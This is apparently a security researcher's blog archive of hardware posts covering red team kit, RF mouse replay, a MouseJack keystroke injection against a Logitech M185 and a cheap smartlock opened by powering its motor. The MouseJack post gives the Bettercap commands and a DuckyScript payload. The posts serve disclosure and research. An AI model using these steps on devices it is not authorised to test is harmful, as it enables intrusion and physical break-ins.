David Sopas – Web Security Researcher

Hardware

23/08/19 Hardware , Tools , Travel # , , ,

My Red Team assessment hardware

My Red Team assessment hardware

Many friends and colleagues are asking me what I use for red team assessments so I decided to write a post with my arsenal – which will could not reflect others Red Team approach.

Also, the hardware is task specific. For example, if you’re going on a Wifi hunt you might not need a set of lockpicking tools – well you never know 🙂

Other people lists can be found here:

Feel free to Tweet @dsopas with new lists or even recommend stuff for me to buy 🙂

no responses
22/08/19 Hardware # , ,

Pointer hijack and portapack testing

When I was in Casa das Artes – venue for an event that I would give a talk – I was discussing some RF topics with my pal Zezadas. One of them was to play with RF pointers… I went home the next day and did a small prank which involved the hackrf replay of a windows (works in 7 or 10) shutdown – video -> here!

If you want to have real fun with pointers – check our mame82 LOGITracker research.

BUT not happy with that, I finally got a portapack for “portability” of hackrf. What should be the first video for showing off portapack? My cat’s RF mouse 😀

Video? -> here!

no responses
18/03/19 Advisories , Hardware # , , , ,

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seing the new update on Bettercap – which supports HID (Human Interface Device) – I decided to read about it – specially on MouseJack keystroke injection attacks.

I went throught the affected devices list and didn’t have any on my own to test it. BUT I had a Logitech M185 wireless mouse which is very popular because… it’s cheap comparing to other models.

I grabbed the CrazyRadio dongle – which was waiting for better usage on my lab –  and put it into action.

I opened Bettercap and turn on the HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple HID.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere 🙂

Next, I created a simple DuckyScript to show the Windows calcultator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

  • Bettercap running with HID module on
  • Detected my Logitech M185 2.4Ghz mouse
  • Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens:

hid.inject ADDR PT ducky.txt

You can see the end result of this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeh it’s vulnerable 🙂

no responses
17/10/18 Hardware , IoT # , , ,

Opening a fingerprint + BLE smartlock – the smart way!

I got my hands on a smartlock that costs around 35€ on Amazon which unlocks using the fingerprint or app (using BLE).
In reality I don’t know the brand and model but this is not something that I really care. What I wanted to check was – how hard was breaking this smartlock?

After a quick inspection I noticed that this lock had something covered below the USB port (which is used to power the battery). Using a sharp knife I scrubbed the thing up and… a screw appeared 🙂

C’mon… Really? I opened it and start disassembling the device.

I needed to scrub also some parts because this lock was supposed to be waterproof so they covered some wires.

In the end, we got a small PCB with a connected fingerprint sensor. Didn’t saw any spring like other locks and can’t manage to open it by shimming. But I saw a motor which was connected by a white and yellow wire to the PCB.

I already played with some motors and other devices like that on Arduino and they usually only need some power to rotate. In this case, I’m guessing that connecting the 3.7V battery to the PCB wires it will rotate (or open).

I grabbed a couple of wires to prevent soldering or damaging the lock and connected them to the lock battery. Than connected the wires to the PCB part that connected to the motor.

And the lock opened. No fingerprint or BLE needed.

Check out the small video that I did – https://www.youtube.com/watch?v=VEjwV3LsLJ0

So I guess you take around 5 second to open this lock using a direct connection to the motor.
The vendor claims its a strong lock… Anyone can break it in 5 seconds.

Screwdrivers rule! 🙂

no responses
10/10/18 Hardware # , , , ,

micro:bit password generator

So I got a new toy – micro:bit. I initially bought three of these devices so I can sniff BLE traffic using btlejack. After playing with it, I decided to learn more about this hardware.

It’s pretty simple to use, specially if you decide to use Microsoft MakeCode, but also support MicroPython. I went with this last one and created something that is still in testing because of hardware limitations.

I decided to create a simple password generator. You have two buttons. Button A (left side) and Button B (right side).
Button A generates “randomly” and displays on the small leds a 4 digit pin number. Button B generates a 12 length char password that will consist in numbers, some letters (some letters don’t display well on the leds) and a couple of symbols.

Why I did this? Well because usually you need something to generate a fast pin or password. Some of my clients NEED this. Nothing is recorded and if you don’t catch the pin or password, click to generate another one.

Next step… Battery. Implement a CR2032 battery with a on/off button. Also, improve the code a bit and share it on github.

Check the video here – https://www.youtube.com/watch?v=M3CO_OvSO4w

no responses